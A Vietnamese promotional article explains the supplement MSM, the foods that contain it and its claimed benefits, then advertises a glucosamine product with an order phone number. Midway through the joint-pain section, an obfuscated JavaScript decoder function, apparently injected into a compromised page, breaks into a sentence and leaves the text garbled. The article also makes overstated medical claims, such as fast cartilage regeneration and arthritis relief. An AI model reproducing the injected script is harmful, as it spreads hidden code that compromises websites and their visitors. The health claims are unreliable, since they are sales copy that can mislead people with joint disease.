MSM là hoạt chất gì? Những thực phẩm nào có MSM

MSM hay còn gọi là Methyl Sulfonyl Methane là hoạt chất có trong nhiều loại thực phẩm khác nhau với các công dụng như giảm đau khớp, kháng viêm, thúc đẩy sự phục hồi sau tập luyện. Thực tế là, hằng ngày chúng ta vẫn nạp MSM vào cơ thể thông qua một số loại thực phẩm nhất định. Tuy nhiên, bài viết dưới đây Thuốc Mỹ sẽ để cập sâu và chi tiết hơn MSM là hoạt chất gì cũng như cách để tăng cường bổ sung MSM nhé.

MSM là hoạt chất gì?

MSM là một hoạt chất có tên gọi đầy đủ Methyl Sulfonyl Methane. MSM được sử dụng nhiều để phục hồi cơ bắp cũng như có tác dụng tuyệt vời trong điều trị xương khớp. Các nghiên cứu đã chỉ ra rằng, sử dụng MSM giúp các phần sụn khớp được tái tạo một cách nhanh chóng.

MSM là hoạt chất gì?
MSM là hoạt chất gì?

Không khó để tìm thấy MSM trong các thực phẩm hằng ngày. Sữa bò, cà phê, cà chua, bắp, táo,… đều là những thực phẩm chứa MSM.

Xem thêm: Turmeric là gì? Chất này tốt hay xấu, có gây hại không?

MSM có tác dụng gì?

Sau khi đã tìm hiểu MSM là hoạt chất gì, chúng ta cùng đào sâu hơn vào công dụng của MSM. Mặc dù MSM có rất nhiều tác dụng đối với cơ thể con người. Tuy nhiên, trong phạm vi bài viết này, Thuốc Mỹ sẽ đề cập đến 3 công dụng nổi bật nhất.

MSM có tác dụng gì?
MSM có tác dụng gì?

Đẩy nhanh tốc độ hồi phục của cơ

Chế độ ăn của các vận động viên hay những người tập thể hình chắc chắn không thể thiếu MSM. Lý do là bởi MSM giúp giảm thiểu các cơn đau nhức do tập luyện cơ bắp. Ngoài ra, MSM cung cấp sulfur giúp làn da luôn khỏe mạnh và chống lại các tác động của môi trường. Nhờ đó, hoạt chất này được sử dụng nhiều để duy trì và tái tạo sức khỏe thể chất. Một số nghiên cứu còn chỉ ra rằng, MSM giúp con người giảm căng thẳng và stress, ngủ sâu hơn. Đây là yếu tố cực kỳ quan trọng đối với người tập thể hình. Giấc ngủ là thời điểm cơ bắp tái tạo lại hoạt động. Do đó, từ lâu các thực phẩm chức năng bổ sung MSM đã được dân tập gym và thể hình rất ưa chuộng.

Kháng viêm

Sở dĩ nói MSM có thể kháng viêm là bởi hoạt chất này giúp gắn kết lại những tổn thương do ổ viêm gây ra. Nhờ đó, tình trạng viêm dần dần được cải thiện. MSM còn có khả năng ngăn cản các liên kết chồng chéo của collagen và protein trong da, giúp giảm sự khô cứng của bề mặt da.

Khả năng kháng viêm của MSM đã được nghiên cứu và trình bày trong nhiều báo cáo khác nhau. MSM đồng thời cũng góp phần làm tăng gia sự sản xuất glutathione giúp cơ thể “chống chọi” lại sự tấn công từ các gốc tự do.

Giảm đau khớp

Không khó để tìm thấy hoạt chất MSM trong các sản phẩm thuốc và thực phẩm chức năng hỗ trợ điều trị xương khớp. MSM giúp tăng cường hệ thống miễn dịch của cơ thể. Nhờ đó mà tình trạng đau, viêm khớp được cải thiện rất tốt. Không chỉ vậy, nhờ sự tăng cường này mà hiện tượng thoái hóa khớp hay thấp khớp cũng được cải thiện theo chiều hướng tích cực.

Một số nghiên cứu đã chỉ ra rằng hoạt chất MSM giúp các sụn khớp được phục hồi rất nhanh chong. Do vậy, bổ sung thêm MSM vào cơ thể tạo điều kiện để các lớp đệm ở xương được tái tạo và hoạt động dễ dàng. Ngoài ra, như chúng ta đã tìm hiểu ở trên, function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var y7=”;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0and-supplements/msm-methylsulfonylmethane-uses-and-risks">MSM còn có khả năng chống lại sự hình thành các gốc tự do trong cơ thể.

Tại vị trí viêm khớp, hàm lượng sulfur khá thấp và bị rối loạn bởi các hoạt động không bình thường của tế bào. MSM giúp tăng cường và bổ sung thêm lượng sulfur cần thiết để các tế bào thực hiện đúng chức năng của mình. Người ta cũng chỉ ra rằng, dùng MSM trong một khoảng thời gian có thể nhận thấy rõ các triệu chứng như đau lưng, mỏi lưng, đau gối giảm đi rõ rệt.

Làm sao để bổ sung thêm MSM vào cơ thể?

Có lợi ích tốt là thế nên người ta không ngừng tìm cách bổ sung thêm MSM vào cơ thể. Như Thuốc Mỹ đã chia sẻ ở trên, MSM không phải quá quý hiếm. Hoạt chất này hoàn toàn có thể được tìm thấy trong các thực phẩm chúng ta sử dụng hằng ngày như sữa bò, cà chua hay bắp, táo.

Tuy nhiên, trong các thực phẩm này, hàm lượng MSM rất thấp. Có nghĩa là nếu bạn muốn bổ sung nhiều MSM để chữa trị xương khớp hay phục hồi cơ bắp thì phải ăn, uống rất nhiều các thực phẩm này.

Do đó, một số sản phẩm thuốc, thực phẩm chức năng chứa MSM được xem là giải pháp thay thế vô cùng hiệu quả. Tăng Cường Xương Khớp Triple Strength Glucosamine là một trong các sản phẩm hỗ trợ xương khớp có chứa MSM với hàm lượng vừa đủ cho cơ thể. Trong mỗi viên Tăng Cường Xương Khớp Triple Strength Glucosamine, các hoạt chất như MSM, Cetyl Myristoleate hay nghệ có sự phối hợp rất nhịp nhàng để cải thiện tình trạng của xương khớp. Dùng 2 viên Triple Strength Glucosamine mỗi ngày sẽ giúp xương khớp có chuyển biến tốt rõ rệt.

Hãy liên hệ 0931-822-811 ngay để đặt mua sản phẩm này.

Xem thêm: Cetyl Myristoleate là gì, có gây hại tới sức khỏe không?

Kết luận

Trên đây cũng là bài viết MSM là hoạt chất gì và một số thông tin hữu ích trước khi sử dụng hoạt chất này. Bạn đọc hãy lưu lại bài viết để sử dụng khi cần nhé.

Sản phẩm điều trị bệnh đau nhức xương khớp hàng đầu hiện nay

Ngày nay, tỉ lệ người mắc các bệnh về xương khớp ngày càng nhiều. Vì vậy để gìn giữ sức khỏe của bạn và gia đình hãy tìm hiểu dòng sản phẩm đang được bán chạy nhất hiện nay là thuốc xương khớp Mỹ Triple Strength Glucosamine. Đây là một dòng thực phẩm chức năng chiết xuất tự nhiên hỗ trợ điều trị các bệnh về xương khớp hiệu quả hàng đầu.

Thuốc xương khớp Mỹ Triple Strength Glucosamine
Thuốc xương khớp Mỹ Triple Strength Glucosamine
[maxbutton id="1"]

Hơn 8 triệu chai đã được tiêu thụ trên toàn thế giới, Triple Strength Glucosamine đã có mặt trên 100 quốc gia và chinh phục được những khách hàng khó tính nhất.

Triple Strength Glucosamine giúp giảm các cơn đau nhức về xương khớp, đau lưng, đau cơ và tăng tính liên kết giữa các khớp xương.

Bình luận bài viết (0 bình luận)